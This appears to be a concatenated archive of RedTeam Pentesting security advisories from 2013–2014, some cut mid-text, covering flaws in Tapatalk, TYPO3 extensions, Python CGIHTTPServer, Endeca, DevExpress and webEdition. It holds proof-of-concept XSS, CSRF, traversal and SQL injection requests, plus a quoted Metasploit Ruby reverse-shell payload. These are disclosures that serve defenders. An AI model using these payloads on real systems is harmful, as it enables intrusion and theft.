The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by specifying the target URL in the URL parameter board_url in URLs like the following: http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de CVE-2014-8870 was assigned to this issue. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpJHKIMmxNYT.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0 RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability in the Tapatalk plugin for the WoltLab Burning Board forum software, which allows attackers to inject arbitrary JavaScript code via URL parameters. Details === Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 Affected Versions: >= 1.0.0 Fixed Versions: 1.1.2 Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: https://tapatalk.com Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015 Advisory Status: published CVE: CVE-2014-8869 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869 Introduction "Tapatalk is an app built for interacting with discussion forums on mobile devices. It differs from a forum’s mobile web skin in that it offers the speed of a native app and a streamlined unified interface for every forum a user subscribes to. Tapatalk also creates a unique eco-system that allows forums to be searched and discovered by millions of Tapatalk users which in turn promotes content, new memberships, and interactions." (from Tapatalk's Homepage) More Details The Tapatalk extension includes the PHP script welcome.php at the path com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php which is accessible via the URL http://www.example.com/mobiquo/smartbanner/welcome.php on systems using the plugin. It outputs JavaScript code that includes improperly encoded values from the two URL parameters "app_android_id" and "app_kindle_url". Depending on which parameters is used, one of their values is assigned to the PHP variable $byo: [...] $.getJSON("",function(data){ [...] Proof of Concept The following URL can be used to demonstrate the vulnerability: http://www.example.com/mobiquo/smartbanner/welcome.php ?app_kindle_url=");alert('RedTeam Pentesting');
[FD] [RT-SA-2014-012] Unauthenticated Remote Code Execution in IBM Endpoint Manager Mobile Device Management Components
n.rb index 7803dd5..e72d8c2 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -141,20 +141,25 @@ class Metasploit3 < Msf::Exploit::Remote # - # This stub ensures that the payload runs outside of the Rails process - # Otherwise, the session can be killed on timeout + # This stub tries to ensure that the payload runs outside of the Rails + # process Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first -if RUBY_PLATFORM =~ /mswin|mingw|win32/ - inp = IO.popen("ruby", "wb") rescue nil - if inp -inp.write(code) -inp.close - end +if RUBY_PLATFORM =~ /mswin|mingw|win32/ and inp = (IO.popen("ruby", "wb") rescue nil) + inp.write(code) +inp.close else - Kernel.fork do + def _fork +begin + Kernel.fork +rescue NotImplementedError + -1 +end + end + pid = _fork + if 0 == pid or -1 == pid eval(code) end end @@ -234,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => datastore['HTTP_METHOD'], }, 25) if res && !res.get_cookies.empty? - match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) + match = res.get_cookies.match(/([_A-Za-z0-9-]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+);/) end if match diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index f17c669..0100929 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb @@ -37,8 +37,31 @@ module Metasploit3 def ruby_string lhost = datastore['LHOST'] lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) -"require 'socket';c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" + - "$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" + -"(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }" +ruby = <<-EOF +require 'socket' +c=TCPSocket.new("#{lhost}", #{datastore['LPORT'].to_i}) +def reopen(old, new) + begin +old.reopen(new) + rescue IOError => e +new + end +end + +$stdin = reopen($stdin, c) +$stdout = reopen($stdout, c) +$stderr = reopen($stderr, c) +$stdin.each_line{ |l| l=l.strip + +next if l.length==0 + +(IO.popen(l,"rb") { |fd| +fd.each_line { |o| +c.puts(o.strip) +} +}) rescue nil +} +EOF +ruby end end Workaround == It might be possible to binary patch the Java class files to use a different secret_token value and redeploy the application. This is untested, however. Fix === Install version 9.0.60100 of the affected software components. Security Risk = The vulnerability allows unauthenticated remote attackers to execute arbitrary code with administrative privileges on the affected systems. It is highly likely that a successful attack on the application server can also be leveraged into a full compromise of all devices managed through the product. This constitutes a high risk. Timeline 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-08-15 Vendor notified, vendor acknowledges receiving the advisory 2014-09-03 Update requested from vendor 2014-09-05 Vendor promises to respond with more details 2014-09-26 Update requested from vendor 2014-09-30 Vendor promises to respond with more details 2014-10-16 Update requested from vendor 2014-10-16 Vendor responds with CVE-ID, plans release for mid-November 2014-11-06 More definite release schedule requested 2014-11-12 Vendor plans release for last week of November 2014-11-21 Additional details requested from vendor 2014-11-22 Vendor responds with details, postpones release to mid-December due to issues discovered during quality control 2014-12-01 Vendor announces imminent release 2014-12-01 Vendor releases security bulletin and software upgrade 2014-12-02 Customer approves public disclosure 2014-12-02 Advisory released References == [0] https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/rails_secret_deserialization.rb RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses
[FD] [RT-SA-2014-011] EntryPass N5200 Credentials Disclosure
se from vendor. Customer discontinued use of the product and approved public disclosure 2014-10-20 Contacted vendor again since no fix or roadmap was provided. 2014-10-28 CVE number requested 2014-11-14 CVE number assigned 2014-12-01 Advisory released RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-009] Information Disclosure in TYPO3 Extension ke_questionnaire
Advisory: Information Disclosure in TYPO3 Extension ke_questionnaire The TYPO3 extension ke_questionnaire stores answered questionnaires in a publicly reachable directory on the webserver with filenames that are easily guessable. Details === Product: ke_questionnaire Affected Versions: 2.5.2 (possibly all versions) Fixed Versions: unknown Vulnerability Type: Information Disclosure Security Risk: medium Vendor URL: http://kequestionnaire.kennziffer.com/ Vendor Status: notified Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-009 Advisory Status: published CVE: CVE-2014-8874 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8874 Introduction "The TYPO3 extension kequestionnaire allows to easily and quickly create and evaluate individual questionnaires online in any TYPO3 website." (translated from the official website of ke_questionnaire) More Details Files containing the answered questionnaires are stored in the "typo3temp" directory within the TYPO3 installation. As the source code of the ke_questionnaire extension shows, the filename of an answered questionnaire is solely based on the questionnaire ID and the user ID of the user who created the questionnaire. Source code (shortened): -- function init() { global $BE_USER,$LANG,$BACK_PATH,$TCA_DESCR,$TCA,$CLIENT,$TYPO3_CONF_VARS; $this->temp_file = \ 'tx_kequestionnaire_temp_'.$this->q_id.'_'.$GLOBALS['BE_USER']->user['uid']; [...] } [...] function createSchedulerTask(){ $myVars = $GLOBALS['BE_USER']->getSessionData('tx_kequestionnaire'); $file_path = PATH_site.'typo3temp/'.$this->temp_file; [...] } -- A valid URL that returns the answers to a questionnaire could look like the following: http://www.example.com/typo3temp/tx_kequestionnaire_temp_15999_7 Proof of Concept Using the tool wfuzz[1] it is possible to search for answers to questionnaires on a TYPO3 site that employs ke_questionnaire: $ python wfuzz.py -c -z range,14000-15000 -z range,1-10 --hc 301 \ http://example.com/typo3temp/tx_kequestionnaire_temp_FUZZ_FUZ2Z Workaround == The webserver config should deny access to answered questionnaire files, for example by adding an .htaccess file that limits access to tx_kequestionnaire_* files (this may hinder online evaluation of the questionnaires). Fix === No official fix available. Security Risk = Depending on the questions in the questionnaire the answered questionnaires may contain personal information including participants' full names, addresses and so on. The risk therefore strongly depends on the information supplied in the questionnaires. Since this information will at least often contain email addresses, it is rated as at least a medium risk. Timeline 2014-04-21 Vulnerability identified 2014-04-30 Customer approved disclosure to vendor 2014-05-13 Vendor notified 2014-05-20 Vendor works with TYPO3 security team on a fix 2014-06-15 Vendor releases updated version which according to them does not fix the issue 2014-10-08 TYPO3 security team says the issue is still unresolved 2014-11-04 Vendor continues to release updated versions, no response whether the security issue is fixed 2014-11-14 CVE number assigned 2014-12-01 Advisory released References == [1] https://code.google.com/p/wfuzz/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-007] Remote Code Execution in TYPO3 Extension ke_dompdf
Advisory: Remote Code Execution in TYPO3 Extension ke_dompdf During a penetration test RedTeam Pentesting discovered a remote code execution vulnerability in the TYPO3 extension ke_dompdf, which allows attackers to execute arbitrary PHP commands in the context of the webserver. Details === Product: ke_dompdf TYPO3 extension Affected Versions: 0.0.3<= Fixed Versions: 0.0.5 Vulnerability Type: Remote Code Execution Security Risk: high Vendor URL: http://typo3.org/extensions/repository/view/ke_dompdf Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-007 Advisory Status: published CVE: CVE-2014-6235 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6235 Introduction "DomPDF library and a small pi1 to show how to use DomPDF to render the current typo3-page to pdf." (taken from the extension's description) More Details The TYPO3 extension ke_dompdf contains a version of the dompdf library including all files originally supplied with it. This includes an examples page, which contains different examples for HTML-entities rendered as a PDF. This page also allows users to enter their own HTML code into a text box to be rendered by the webserver using dompdf. dompdf also supports rendering of PHP files and the examples page also accepts PHP code tags, which are then executed and rendered into a PDF on the server. Since those files are not protected in the TYPO3 extension directory, anyone can access this URL and execute arbitrary PHP code on the system. This behaviour was already fixed in the dompdf library, but the typo3 extension ke_dompdf supplies an old version of the library that still allows the execution of arbitrary PHP code. Proof of Concept Access examples.php on the vulnerable system: http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.php Enter PHP code in the text box on the bottom of the page and click the submit button, for example: The page will return a PDF file containing the output of the PHP code. Workaround == Remove the directory "www" containing the examples.php file or at least the examples.php file from the extensions' directory. Fix === Update to version 0.0.5 of the extension. Security Risk = high Timeline 2014-04-21 Vulnerability identified 2014-04-30 Customer approved disclosure to vendor 2014-05-06 CVE number requested 2014-05-10 CVE number assigned 2014-05-13 Vendor notified 2014-05-20 Vendor works with TYPO3 security team on a fix 2014-09-02 Vendor released fixed version [2] 2014-12-01 Advisory released References == The TYPO3 extension ke_dompdf contains an old version of the dompdf library, which contains an example file that can be used to execute arbitrary commands. This vulnerability was fixed in dompdf in 2010. The relevant change can be found in the github repository of dompdf: [1] https://github.com/dompdf/dompdf/commit/ e75929ac6393653a56e84dffc9eac1ce3fb90216 TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions: [2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/ typo3-ext-sa-2014-010/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution
;' scriptname = dir + '/' + script scriptfile = self.translate_path(scriptname) if not os.path.exists(scriptfile): self.send_error(404, "No such CGI script (%r)" % scriptname) return if not os.path.isfile(scriptfile): self.send_error(403, "CGI script is not a plain file (%r)" % scriptname) return [...] [...] For HTTP GET requests, do_GET() first invokes send_head(). That method calls is_cgi() to determine whether the requested path is to be executed as a CGI script. The is_cgi() method uses _url_collapse_path() to normalize the path, i.e. remove extraneous slashes (/),current directory (.), or parent directory (..) elements, taking care not to permit directory traversal below the document root. The is_cgi() function returns True when the first path element is contained in the cgi_directories list. As _url_collaps_path() and is_cgi() never URL decode the path, replacing the forward slash after the CGI directory in the URL to a CGI script with the URL encoded variant %2f leads to is_cgi() returning False. This will make CGIHTTPRequestHandler's send_head() then invoke its parent's send_head() method which translates the URL path to a file system path using the translate_path() method and then outputs the file's contents raw. As translate_path() URL decodes the path, this then succeeds and discloses the CGI script's file contents: $ curl http://localhost:8000/cgi-bin%2ftest.py #!/usr/bin/env python2 import json import sys db_credentials = "SECRET" sys.stdout.write("Content-type: text/json\r\n\r\n") sys.stdout.write(json.dumps({"text": "This is a Test"})) Similarly, the CGIHTTPRequestHandler can be tricked into executing CGI scripts that would normally not be executable. The class normally only allows executing CGI scripts that are direct children of one of the directories listed in cgi_directories. Furthermore, only direct subdirectories of the document root (the current working directory) can be valid CGI directories. This can be seen in the following example. Even though the sample server shown above includes "/cgi-bin/subdir" as part of the request handler's cgi_directories, a CGI script named test.py in that directory is not executed: $ curl http://localhost:8000/cgi-bin/subdir/test.py [...] Error code 403. Message: CGI script is not a plain file ('/cgi-bin/subdir'). [...] Here, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and returned True. Next, run_cgi() further dissected these paths to perform some sanity checks, thereby mistakenly assuming subdir to be the executable script's filename and test.py to be path info. As subdir is not an executable file, run_cgi() returns an error message. However, if the forward slash between subdir and test.py is replaced with %2f, invoking the script succeeds: $ curl http://localhost:8000/cgi-bin/subdir%2ftest.py {"text": "This is a Test"} This is because neither is_cgi() nor run_cgi() URL decode the path during processing until run_cgi() tries to determine whether the target script is an executable file. More specifically, as subdir%2ftest.py does not contain a forward slash, it is not split into the script name subdir and path info test.py, as in the previous example. Similarly, using URL encoded forward slashes, executables outside of a CGI directory can be executed: $ curl http://localhost:8000/cgi-bin/..%2ftraversed.py {"text": "This is a Test"} Workaround == Subclass CGIHTTPRequestHandler and override the is_cgi() method with a variant that first URL decodes the supplied path, for example: class FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler): def is_cgi(self): self.path = urllib.unquote(self.path) return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self) Fix === Update to the latest Python version from the Mercurial repository at http://hg.python.org/cpython/ Security Risk = The vulnerability can be used to gain access to the contents of CGI binaries or the source code of CGI scripts. This may reveal sensitve information, for example access credentials. This can greatly help attackers in mounting further attacks and is therefore considered to pose a high risk. Furthermore attackers may be able to execute code that was not intended to be executed. However, this is limited to files stored in the server's working directory or in its subdirectories. The CGIHTTPServer code does contain this warning: "SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL" Even when used on a local computer this may allow other local users to execute code in the context of another user. Timeline 2014-04-07 Vulnerability identified 2014-06-11 Customer approved disclosure
[FD] [RT-SA-2013-003] Endeca Latitude Cross-Site Scripting
Advisory: Endeca Latitude Cross-Site Scripting RedTeam Pentesting discovered a Cross-Site Scripting (XSS) vulnerability in Endeca Latitude. By exploiting this vulnerability an attacker is able to execute arbitrary JavaScript code in the context of other Endeca Latitude users. Details === Product: Endeca Latitude Affected Versions: 2.2.2, potentially others Fixed Versions: N/A Vulnerability Type: Cross-Site Scripting Security Risk: high Vendor URL: N/A Vendor Status: decided not to fix Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-003 Advisory Status: published CVE: CVE-2014-2400 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2400 Introduction Endeca Latitude is an enterprise data discovery platform for advanced, yet intuitive, exploration and analysis of complex and varied data. Information is loaded from disparate source systems and stored in a faceted data model that dynamically supports changing data. This integrated and enriched data is made available for search, discovery, and analysis via interactive and configurable applications. (from the vendor's homepage) More Details Endeca Latitude offers administrators to trigger different functions by using the following two URLs (see [1]): * http://example.com/config?op= * http://example.com/admin?op= When accessing such an URL which uses an invalid value for the HTTP GET parameter "op", such as http://example.com/config?op=RedTeam%20Pentesting, an error message is shown by the webapplication and the invalid value is directly embedded into the document without prior escaping, which leads to a Cross-Site Scripting vulnerability. Proof of Concept As shown by the following URL, an attacker is able to embed arbitrary JavaScript code into the context of the Endeca Latitude instance: http://example.com/config?op=alert('RedTeam Pentesting'); Workaround == The vendor did not update the vulnerable software, but recommends to configure all installations to require mutual authentication using TLS certificates for both servers and clients, while discouraging users from installing said client certificates in browsers. Fix === Not available. The vendor did not update the vulnerable software to remedy this issue. Security Risk = The vulnerability can be used to embed arbitrary JavaScript code and therefore offers a wide range of possible attacks such as stealing cookies or displaying a fake login form. Furthermore, an attacker can use this vulnerability to control the Endeca Latitude instance by using the API implemented by its web service (see [2]). The risk of this vulnerability is therefore considered to be high. Timeline 2013-10-06 Vulnerability identified 2013-10-08 Customer approved disclosure to vendor 2013-10-15 Vendor notified 2013-10-17 Vendor responded that investigation/fixing is in progress 2014-02-24 Vendor responded that bug is fixed and scheduled for a future CPU 2014-03-13 Vendor responded with additional information about a potential workaround 2014-04-15 Vendor releases Critical Patch Update Advisory with little information on the proposed fix 2014-04-16 More information requested from vendor 2014-05-02 Vendor responds with updated information 2014-06-25 Advisory released References == [1] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/src/cadm_url_about_admin_urls.html [2] http://docs.oracle.com/cd/E29220_01/index.htm RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2013-002] Endeca Latitude Cross-Site Request Forgery
Advisory: Endeca Latitude Cross-Site Request Forgery RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF) vulnerability in Endeca Latitude. Using this vulnerability, an attacker might be able to change several different settings of the Endeca Latitude instance or disable it entirely. Details === Product: Endeca Latitude Affected Versions: 2.2.2, potentially others Fixed Versions: N/A Vulnerability Type: Cross-Site Request Forgery Security Risk: low Vendor URL: N/A Vendor Status: decided not to fix Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-002 Advisory Status: published CVE: CVE-2014-2399 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2399 Introduction Endeca Latitude is an enterprise data discovery platform for advanced, yet intuitive, exploration and analysis of complex and varied data. Information is loaded from disparate source systems and stored in a faceted data model that dynamically supports changing data. This integrated and enriched data is made available for search, discovery, and analysis via interactive and configurable applications. (from the vendor's homepage) More Details Endeca Latitude offers administrators the ability to perform different administrative and configuration operations by accessing URLs. These URLs are not secured by a randomly generated token and therefore are prone to Cross-Site Request Forgery attacks. For example by accessing the URL http://example.com/admin?op=exit an administrator can shut down the Endeca Latitude instance. Several other URLs exist (as documented at [1] and [2]) which can be used to trigger operations such as flushing cashes or changing the logging settings. Proof of Concept An attacker might prepare a website, which can trigger arbitrary functionality (see [1] and [2]) of an Endeca Latitude instance if someone opens the attacker's website in a browser that can reach Endeca Latitude. An easy way to implement this is to embed a hidden image into an arbitrary website which uses the corresponding URL as its source: http://example.com/admin?op=exit"; style="display:hidden" /> http://example.com/config?op=log-disable"; style="display:hidden" /> [...] Workaround == The vendor did not update the vulnerable software, but recommends to configure all installations to require mutual authentication using TLS certificates for both servers and clients, while discouraging users from installing said client certificates in browsers. Fix === Not available. The vendor did not update the vulnerable software to remedy this issue. Security Risk = The vulnerability can enable attackers to be able to interact with an Endeca Latitude instance in different ways. Possible attacks include the changing of settings as well as denying service by shutting down a running instance. Attackers mainly benefit from this vulnerability if the instance is not already available to them, but for example only to restricted IP addresses or after authentication. Since this makes it harder to identify potential target systems and the attack mainly allows to disturb the service until it is re-started, the risk of this vulnerability is considered to be low. Timeline 2013-10-06 Vulnerability identified 2013-10-08 Customer approved disclosure to vendor 2013-10-15 Vendor notified 2013-10-17 Vendor responded that investigation/fixing is in progress 2014-02-24 Vendor responded that bug is fixed and scheduled for a future CPU 2014-03-13 Vendor responded with additional information about a potential workaround 2014-04-15 Vendor releases Critical Patch Update Advisory with little information on the proposed fix 2014-04-16 More information requested from vendor 2014-05-02 Vendor responds with updated information 2014-06-25 Advisory released References == [1] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20administrative%20operations [2] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20supported%20logging%20variables RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de G
[FD] [RT-SA-2014-006] Directory Traversal in DevExpress ASP.NET File Manager
Advisory: Directory Traversal in DevExpress ASP.NET File Manager During a penetration test RedTeam Pentesting discovered a directory traversal vulnerability in DevExpress' ASP.NET File Manager and File Upload. Attackers are able to read arbitrary files by specifying a relative path. Details === Product: DevExpress ASPxFileManager Control for WebForms and MVC Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8 Fixed Versions: DevExpress ASPxFileManager v13.2.9 Vulnerability Type: Directory Traversal Security Risk: high Vendor URL: https://www.devexpress.com/Products/NET/Controls/ASP/File-Upload-Explorer/ Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006 Advisory Status: published CVE: CVE-2014-2575 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575 Introduction "The DevExpress ASP.NET Subscription includes a standalone Multi-File Upload Manager for WebForms and MVC and a pre-built File Manager for WebForms; built so you can instantly introduce file management capabilities in your next web application." (from DevExpress' Homepage) More Details The ASPX File Manager component is prone to a directory traversal vulnerability. Attackers with access to the File Manager component can read arbitrary files on the same partition as the shared directory. A common request to download a file via the File Manager component requires multiple HTTP-Post parameters: __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1 __EVENTARGUMENT=13%7C __EVENTVALID= The parameter __EVENTARGUMENT=13| specifies a file download and the file which is to be downloaded. Attackers may also request files outside of the shared directory by prepending a relative path to a parent directory. Proof of Concept By requesting files with a relative path, files otherwise not available will be accessible through the File Manager component. Depending on the shared directory and the webserver configuration, the webserver configuration file might for example be accessible through the File Manager component: __EVENTARGUMENT=13|../../web.config Other sensitive operating system files could be affected, too. Example exploit: curl --data __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1\ "&__EVENTARGUMENT=13%7C../../web.config&=&__EVENTVALID" \ http://example.com/FileManagerComponent.aspx The request above will download the specified file. Workaround == Instead of a physical file system provider, a database file system provider with limited access permissions could be used. Fix === Update ASPxFileManager control to DevExpress libraries version v13.2.9. Security Risk = The risk is estimated to be high. This vulnerability allows attackers to access arbitrary files on the same partition as the File Manager's root directory. This may allow attackers to read sensitive information like the webserver configuration. Timeline 2014-03-10 Vulnerability identified 2014-03-21 Customer approved disclosure to vendor 2014-03-21 CVE number requested and assigned 2014-03-25 Vendor notified 2014-04-11 Customer opened support ticket with vendor 2014-04-17 Vendor released fixed version 2014-04-17 Vendor released security advisory to customers 2014-06-05 Advisory released References == Vendor Security Advisory: http://security.devexpress.com/de7c4756/?id=ff8c1703126f4717993ac3608a65a2e2 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: Digital signature ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2014-005] SQL Injection in webEdition CMS File Browser Installer Script
Advisory: SQL Injection in webEdition CMS File Browser RedTeam Pentesting discovered an SQL injection vulnerability in the file browser component of webEdition CMS during a penetration test. Unauthenticated attackers can get read-only access on the SQL database used by webEdition and read for example password hashes used by administrative accounts. Details === Product: webEdition CMS Affected Versions: webEdition 6.3.8.0 svn6985 down to 6.3.3.0, probably earlier versions, too Fixed Versions: 6.2.7-s1 - 6.3.8-s1 Vulnerability Type: SQL Injection Security Risk: high Vendor URL: http://www.webedition.org Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-005 Advisory Status: published CVE: CVE-2014-2303 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2303 Introduction "webEdition is a flexible CMS for companies of every size. It offers a great amount of functionality and can be flexibly customized for individual needs. It is ideally suited for users who want to operate their web-site comfortably. Even the creation of custom web-applications is easily possible with webEdition." (translated from webEdition homepage) More Details The webEdition CMS contains a file browser component that allows browsing parts of the website's filesystem structure. It is usually reachable under the following URL: http://www.example.com/webEdition/we_fs.php When browsing to individual directories, HTTP GET requests such as the following are sent to the web server: GET /webEdition/we_fs.php?what=4&table=tblFile&id=1&order=IsFolder%20 DESC,%20Text&filter= HTTP/1.1 Host: www.example.com [...] The server responds with JavaScript code that updates the directory listing: top.clearEntries(); top.addEntry(13,"folder.gif","careers",1,"/en/careers"); top.addEntry(14,"folder.gif","company",1,"/en/company"); top.addEntry(15,"folder.gif","contact",1,"/en/contact"); top.addEntry(20,"we_dokument.gif","index.php",0,"/en/index.php"); top.writeBody(top.fsbody.document); [...] The requests which are sent to retrieve this information contain two interesting parameters: "table" with a value of "tblFile" which appears to name a database table, and the parameter "order" with a value of "IsFolder DESC, Text", which contains parts of an SQL ORDER BY clause. In combination, these two parameters can be used to perform SQL injection attacks. It appears that they are embedded into an SQL query in a similar manner as follows: SELECT ID,ParentID,Text,Path,IsFolder,Icon FROM tblFile WHERE [...] ORDER BY IsFolder DESC, Text Using a "table" parameter value of "tblFile WHERE 1=1 /*" and an "order" parameter value of "*/", will result in a query similar to the following: SELECT ID,ParentID,Text,Path,IsFolder,Icon FROM tblFile WHERE 1=1 /* WHERE [...] ORDER BY */ The queries executed by the CMS retrieve six columns, which can be seen in the application's source code, or by injecting ORDER BY clauses with numeric column indexes into the query. Knowing the number of columns in a query, it is typically 